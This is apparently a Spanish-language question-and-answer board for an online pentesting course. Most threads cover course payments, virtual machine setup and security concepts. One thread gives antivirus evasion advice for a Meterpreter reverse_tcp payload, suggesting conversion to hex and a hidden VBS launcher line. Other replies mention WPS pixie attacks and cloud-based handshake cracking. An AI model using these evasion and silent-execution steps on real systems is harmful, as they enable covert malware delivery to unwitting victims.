Dashboard » Debates

Preguntas y respuestas para pentester


Charly face Rodolfo Madrid realizo una pregunta

Ingeniería social Escondiendo el ataque en códigos QR

cuando intento generar el código QR en la parte donde se pone la ip y el puerto me sale este mensaje y no lo genera: Something went wrong, printing the error: save() got an unexpected keyword argument 'format' pongo el http://aquilaip:aquielpuerto exactamente como lo hace en el video solo que con mi ip local



Ver todos comentarios
Charly face Alberto Ruiz Ospina ha comentado hace
alrededor de 3 años

hola.Talvéz el problema se solucione cambiando tu ip local por tu ip publica "normalmente empiezan por 190,192,203" dependiendo de tu pais. Feliz tarde


Completa tu perfil para poder comentar.


Charly face Erick Ramirez realizo una pregunta

Cursos individuales-modalidad pago

Que tal estiamdos. espero se encuentren bien, tengo una duda de las modalidades de pago aparece en el cursos de ingeniería social un precio de 9 dolares, mi pregunta es ¿Cuanto tiempo tengo disponible el curso o como es la modalidad para tomar esos cursos?



Ver todos comentarios
Profile Omar Jacobo Muñoz Veliz ha comentado hace
más de 3 años

Al comprar un curso individual lo tienes por 1 mes. Saludos


Completa tu perfil para poder comentar.


252860 Alejandro Canosa Ferreiro realizo una pregunta

no consigo sacar la clave del reto 5

hola he utilizado jhn the ripper en el reto 5 de la segunda parte del curso pero no consigo sacar la clave a partir del hash encontrado y estubo horas ,alguna otra manera?



Ver los 2 comentarios
Charly face Wilfredo Sanabria ha comentado hace
más de 3 años

hola... cual reto en especifico y que curso...?


252860 Alejandro Canosa Ferreiro ha comentado hace
más de 3 años

hola nada ya lo consegui gracias por responder

saludos


Completa tu perfil para poder comentar.


Charly face Wilkin Heredia realizo una pregunta

descifrar handshake .cap

Hola está viendo el curso de hacking wifi y oí que el profesor dijo que existen página para descifrar la captura de handshark , si alguien sabe alguna forma de desifrarla o alguna página se lo agradeseria ya que resulta molesto con los diccionario quiero una página aunque sea pagada . Saludós



Ver los 10 comentarios
Cheshire Qismon . ha comentado hace
más de 3 años

Buenas respuestas, tambien si quieres probar el wps pixie attack.

Si estas usando Kali entonces solo escribir asi:

wifite -wps --pixie


500px glider.svg Eyver Emilio Vargas Medina ha comentado hace
alrededor de 3 años

Buenas, estoy en un caso similar al tuyo Heredia, pero,me tope con esto https://hacking-etico.com/2013/12/26/wpa-cloud-computing/ aprovechando clusters alquilados de amazon para probar con diccionarios.... aun es valido?Vi la opcion del ap falso y phising del router, y se ve mas interesante :3 pero, tambien escuche que se puede optimizar la fuerza bruta por diccionarios, con unas playStation 4, ya que tienen buena tarjeta de video... como dije... solo esuche de eso, seria bueno, probarlo .3 y haber que tal (probar 4 playStation a la ver seria genial)


Completa tu perfil para poder comentar.


Charly face Braiant Giraldo realizo una pregunta

[Ayuda]Curso/capacitación/certificación Ethical Hacking / PenTest en sistemas SCADA

Buenas tardes a todos

Quisiera saber si ustedes conocen de empresas que dicten Cursos/capacitaciones/certificaciones en Ethical Hacking/Penetration Test en sistemas SCADA. Si es en Colombia puede ser presencial y/o virtual pero para países diferentes a Colombia debería ser virtual.

Muchas gracias por sus aportes

Cordialmente,



Ver los 4 comentarios
20160822 110142 Mario Rodriguez Barraza ha comentado hace
más de 3 años

Bralant, gusto saludarte especificamente PentTest o Ethical Hacking sobre los sistemas SCADA dudo mucho que encuentres ya que el tema de hacking es de manera general expresa los conocimientos necesarios para explotar todo tipo de sistemas, posiblemente encontraras alguno pero considero tomes los cursos de BTA los cuales podran apoyarte para darte esa lógica de hacking que ncesitas.

Saludos


Charly face Antonio Orozco ha comentado hace
más de 3 años

Etek ofrece un curso en colombia:

https://www.etek.com.co/Pages/etek-university.aspx

El curso se llama • Pentesting y Aseguramiento de Infraestructura Critica (SCADA).

El ethical hacking son tecnicas.. y los sistemas de control de automatizacion industrial son muy sensibles y realizar un analisis de vulnerabilidades puede llegar a ocasionar un DOS a ciertos elementos criticos para el proceso industrial, es por eso que se debe realizar una estrategia de pentest muy diferente a estos escenarios.

Saludos.


Completa tu perfil para poder comentar.


Charly face Diego Valencia realizo una pregunta

sin adaptador wifi in kali

Buenos dias. antes que nada y primero que todo. tengo un problema con kali rolling despues de instalado en virtualbox. kali no reconoce el adaptador wifi solo eth0. y en la red no he encontrado una solucion alguien sabe porque podria ser?.

win 10, virtual box arquitectura de 64. gracias. cordialmente diego v.



Ver los 2 comentarios
Cheshire Qismon . ha comentado hace
más de 3 años

Necesitas agregar el USB dongle a Virtualbox.....eso seria el primero paso

Si ya hiciste eso y todavia no reconoce el USB, a veces necesitas editar el filtro en Virtualbox y solo llenar el "Name" y "Vendor ID" y "Product ID" del USB dongle.


Foto1 Isamar Parada Díaz ha comentado hace
más de 3 años

Dos veces me pasó algo como eso, en una maquina virtual, tuve que descargar desde la maquina en google "download compat wireless" Luego descargue la compat-wireless-2010-09-01-p.tar.bz2 y luego la ejecute desde la consola , con esto logré activarla.La otra nunca pude lograrlo (otro equipo) y era porque la tarjeta de wifi (PCI) no era compatible para auditoria.


Completa tu perfil para poder comentar.


252860 Alejandro Canosa Ferreiro realizo una pregunta

Para cuando los examenes de hacking web,hacking Wireless y analisis de vulnerabiliadees

Esos cursos no tienen examen ni se puede generar diploma ,para cuando cualquiera de esas opciones ? Cordiales saludos



Ver los 5 comentarios
Profile Omar Jacobo Muñoz Veliz ha comentado hace
más de 3 años

Muy bien :)


252860 Alejandro Canosa Ferreiro ha comentado hace
más de 3 años

hola buenas noches el curso de pentest avanzado no tiene examen al igual que el de hacking web , analisis de vulnerabiliades y el de creacion de informes


Completa tu perfil para poder comentar.


Charly face Chris Alvarado realizo una pregunta

llevo sus cursos basicos

Buenas alejandro, es para saber como hago para poner parrot en el virtualbox ya q he intentado instalarlo y nada



Ver todos comentarios
Profile Omar Jacobo Muñoz Veliz ha comentado hace
más de 3 años

Que error te da.


Completa tu perfil para poder comentar.


Foto José María Pérez Vega realizo una pregunta

comando dnsenum

Buenas tardes, después de instalar la aplicación pentestbox, estoy probando el comando dnsenum pero me sale el siguiente error: "dnsenum" no se reconoce como comando interno o externo, programa o archivo por lotes ejecutables. He intentando buscar información sobre este error pero no he encontrado nada que me ayude. Incluso no he encontrado el comando dnsenum en el listado de pentestbox tools de la página oficial de la aplicación. ¿qué es lo que ocurre? ¿porqué no me funciona este comando? Gracias.



Ver todos comentarios
252860 Alejandro Canosa Ferreiro ha comentado hace
más de 3 años

en pentestbox no hay ese comando hay dnsrecon que es parecido ,de todas maneras aqui en el enlace de abajo se ven todas las herramientas que tiene ese emulador

https://tools.pentestbox.org/

saludos


Completa tu perfil para poder comentar.


Charly face Yilson Jimenez Rodriguez realizo una pregunta

En el curso de Enterprise Pentesting no otorgan certificado digital?

Quiero saber si alguien tiene conocimiento de los cursos basicos gratis, dan diplomas o algo asi...



Ver los 4 comentarios
Charly face Yilson Jimenez Rodriguez ha comentado hace
más de 3 años

Gratuitos, Juan Duarte...... Por ahi estoy empezando


Charly face Yilson Jimenez Rodriguez ha comentado hace
más de 3 años

Yo termine el curso de Pentesting enterprise y no veo certificado....Sera porque es gratis?


Completa tu perfil para poder comentar.


Charly face Chamaco Varon realizo una pregunta

VPN gratis o de pago segura

Hola amigos visto que en este ambiente de la seguridad en la mayor parte de los casos se usa una vpn o proxy,quisiera saber se alguno sabe de alguna vpn gratis o las mejores de pago ?



Ver los 3 comentarios
Profile Omar Jacobo Muñoz Veliz ha comentado hace
más de 3 años

Puedes usar DotVPN tiene su version gratis que es muy buena y una de pago asi como tunnel bear. Saludos.


Cheshire Qismon . ha comentado hace
más de 3 años

Si quieres algo gratis puedes usar Proxifier + TOR, asi puedes enviar todo tu trafico de cualquier browser/applicacion (Menos Skype) a la red de TOR.

https://www.proxifier.com/

  • Abrir el TOR browser (no usarlo despues)
  • Configurar una regla para enviar todo el trafico a 127.0.0.1 en puerto 9150

Ahora cada applicacion/browser que usas va tener un IP de la red de TOR.

Si quieres pagar para un VPN, entonces buscar un VPN que tiene una poliza de "NO LOGS" y tiene Bitcoin como una forma de pago. nVPN es muy bueno en eso.


Completa tu perfil para poder comentar.


252860 Alejandro Canosa Ferreiro realizo una pregunta

encriptacion de payload

Buenas tardes en el ultimo video se ejecuta msfpayload windows/meterpreter/reverse_tcp/ lhost=direccion local lport=443 pero la parte de la encriptacion por el logo de backtrack no se ve alguien me puede decir como encriptar el paylod en este comando para que se blinde y no pueda ser detectado por un virus?,en el utltimo video lo explica pero no he podido ver lo que escriben en esa parte de la linea por el logo de backtrack adademy

cordiales saludos a todos



Ver los 3 comentarios
252860 Alejandro Canosa Ferreiro ha comentado hace
más de 3 años

muchas gracias compa lo probare en cuanto pueda un saludo


Cheshire Qismon . ha comentado hace
más de 3 años

Veil-Evasion & MSF Venom son muy publicas y su encriptacion es muy conocido, pero todavia funciona con algunas anti-virus.

Si quieres algo que esta totalmente indetectable "scantime" entonces puedes convertir tu payload binary a HEX y despues que esta en el PC del "target" puedes convertir a .exe para ejecutarlo. Eso se llama "Inline File Transfer" y puedes lograr eso con este pequeno herramienta.

https://github.com/g0tmi1k/exe2hex

Ahora puedes crear un script de VBS que puede llamar este payload en silencio, asi:

CreateObject("WScript.Shell").RUN "C:\Users\Public\payload.cmd", 0, True


Completa tu perfil para poder comentar.


Foto de perfil Elizardo David Cuello Rodríguez realizo una pregunta

Problema al intentar volver a tomar mis examenes

Buenas tardes, quisiera saber porque solo tenia una oportunidad para rendir en mis exámenes ya que adquirí una cueta premium y dice Tendrás 36 oportunidades para rendir exámenes y obtener tu certificado.

Saludos coordiales, quisiera que me respondieran lo mas rápido posible.



Ver los 3 comentarios
Foto de perfil Elizardo David Cuello Rodríguez ha comentado hace
más de 3 años

Gracias Felipe.


Charly face Victor Oliveros ha comentado hace
más de 3 años

Hola quisiera saber si hay alguna forma de poder obtener todos los cursos de manera gratis estoy dispuesto a estudiar todas las horas que sean y demas estoy muy interesado en esto pero no tengo los suficientes recursos para pagarme una cuenta premium espero me ayuden antemano gracias...:(


Completa tu perfil para poder comentar.


252860 Alejandro Canosa Ferreiro realizo una pregunta

fallo en el curso de Wireshark

buenas noches en el curso de Wireshark yo vi todos los videos e hice el examen pero a pesar de eso sigue poniendo un 97% en la barra de estado del curso,no tenia que poder 100 si has visto todos los videos del curso y ademas estan marcados como vistos?

cordiales saludos



Ver los 3 comentarios
Profile Omar Jacobo Muñoz Veliz ha comentado hace
más de 3 años

Estamos revisando tu caso, antes ve si en cada video del curso tienes completado el 100%. Saludos


252860 Alejandro Canosa Ferreiro ha comentado hace
más de 3 años

todos estan completos ,es un bug de la aplicacion


Foto de perfil Elizardo David Cuello Rodríguez realizo una pregunta

He pagado la suscripción por 12 meses; Pero no tengo las 36 oportunidades para rendir exámenes y obtener mis certificado.

Buenos días ya tengo varios dias sin poder seleccionar mis examenes porque no tengo oportunidades y yo me suscribí por 12 meses quisiera saber que ha estado pasando y que me den una respuesta lo mas rápido posible y tambien me ha aparecido un mensaje que ya he sido identificado, quisiera saber que me explicaran todo eso.

Saludos coordiales, espero sus respuestas.



Ver los 2 comentarios
Foto de perfil Elizardo David Cuello Rodríguez ha comentado hace
más de 3 años

Ok Omar estoy pendiente por favor trata de informarme lo más rápido posible.


Profile Omar Jacobo Muñoz Veliz ha comentado hace
más de 3 años

Estoy revisando tu caso, cuando lo arregle te avisare :), lamentamos los inconvenientes.


Completa tu perfil para poder comentar.


Flashkr Carlos Guerrero realizo una pregunta

¿hay algún orden para tomar cursos ?

Hola soy nuevo, y soy principiante, existe algo asi como cursos basicos o es necesario leer algun libro que recomienden?



Ver todos comentarios
Profile Omar Jacobo Muñoz Veliz ha comentado hace
más de 3 años

Si no tienes conocimienos podrias empezar con el curso de Enterprise Pentesting para tener una idea de como es ser un hacker y luego ir escalando entre los cursos. Saludos


Completa tu perfil para poder comentar.


Charly face Jonathan Rojas realizo una pregunta

Forma de pago

Hola deseo adquirir el modulo de 6 meses para todos los cursos. pero no puedo hacer el pago por yo soy de Ecuador y quisiera pagar con Tarjeta de Credito...Me puedes decir como lo puedo hacer.....



Ver todos comentarios
Profile Omar Jacobo Muñoz Veliz ha comentado hace
más de 3 años

Puedes comunicarte con nosotros por mensaje en la pagina de fb para que te indiquemos como puedes adquirir este plan. Saludos.


Completa tu perfil para poder comentar.


Charly face Osiris L realizo una pregunta

¿Con qué debería comenzar para aprender de seguridad informatica?

Voy iniciando mi carrera en Ing. en Sistemas y me gustaría especializarme en seguridad. Que sería lo basico que se debe aprender para seguir aprendiendo. Cabe mencionar que solo e visto C++ y Java, claro, esto en lo basico.

Si me pudieran ayudar con una "guia basica" de lo principal para iniciar como:

1.-¿Que es lo basico que debo aprender? 2.-Lenguajes mas útiles o basicos. 3.-Bibliografías recomendadas. etc.

Estoy iniciando y me gustaría comenzar con el pie derecho.

Espero que me puedan ayudar :D!. Saludo.

P.D. Si ya se realizó la pregunta, si me pueden pasar el link porque la busqué y no encontre :/. Gracias.



Ver los 4 comentarios
Charly face Angel David Muñoz Metz ha comentado hace
más de 2 años

Osiris L como vas en seguridad informatica un año despues del post ?



Completa tu perfil para poder comentar.


20160822 110142 Mario Rodriguez Barraza realizo una pregunta

¿Cual es la diferencia entre vulnerabilidad, amenaza y riesgo?

Con base a su experiencia y para conocer sobre que piensan, comenten cual es la diferencia entre estos tres terminos manejados en el ambito de la seguridad.



Ver los 7 comentarios
Photo Andros Fuentes ha comentado hace
más de 3 años

Riesgo = Probabilidad de que una Amenaza explote una Vulnerabilidad de un Activo generando un Impacto

R = P x Am x V x Ac x I


Charly face Tralix Mexico S De Rl De Cv Rfc Tle011122 Sc2 ha comentado hace
más de 2 años

Ejemplo:

Vulnerabilidad: Rodilla izquierda débil. Amenaza: Personas y objetos que pasan cerca de la rodilla izquierda. Exploit: Moverse al lado izquierdo, esperar a que esté a 1 metro , dar 2 pasos y tirarle una patada al centro de la rodilla izquierda. Impacto: Consecuencia una vez que se le dió un golpe a la rodilla izquiera. bajo(Solo dijo ouch!), medio (se tambaleó),alto (se cayó). Probabilidad: Sube con respecto a la cantidad de objetos y/o personas que esten cerca de la rodilla izquierda, si se conoce que la rodilla izquierda esta débil, si se conoce el "exploit" para tumbar a la persona impactando la rodilla izquierda. Riesgo: Grado de exposición, Factor de relación entre impacto y probabilidad.


Completa tu perfil para poder comentar.


Charly face Cristian Estrada realizo una pregunta

¿Que nos impide hacer un escaneo dentro de una red ?

En una red corporativa que dispositivos impiden llevar a cabo, o en su caso no nos permiten snifear la red con wireshark?



Ver los 8 comentarios
252860 Alejandro Canosa Ferreiro ha comentado hace
más de 3 años

Hola bueno yo nunca he realizado sniffing en una red pero la teoria dice que si esta conectado a un switch que es lo mas normal no vas a poder snifar nada con wireshark que no salga de tu equipo porque estos dispositivos crean un dominio de colision en cada puerto por lo tanto a no ser que estes conectado a un puerto mediante un hub y que otros equipos esten conectados a ese mismo hub no vas a snifar nada aunque la tarjeta este en modo promiscuo asi que o utilizas ethercap para realizar un MITM o no vas a poder capturar trafico de tu subred ;lo del switch es una contramedida precisamente contra estos ataques de sniffing


Photo Andros Fuentes ha comentado hace
más de 3 años

En mi experiencia, cuando intentas hacer un escaneo a una red corporativa, normalmente puedes encontrar los siguientes impedimentos: * Bloqueo por parte de los dispositivos de red (routers, firewalls, etc) * Reglas de negocio de antivirus * Bloqueo de puertos * ACL's * No incluir IP's necesarias en archivo Hosts (solo en caso de que se encuentren en DMZ). * Mala configuración de tarjeta de red, o configuracion de WireShark.


Completa tu perfil para poder comentar.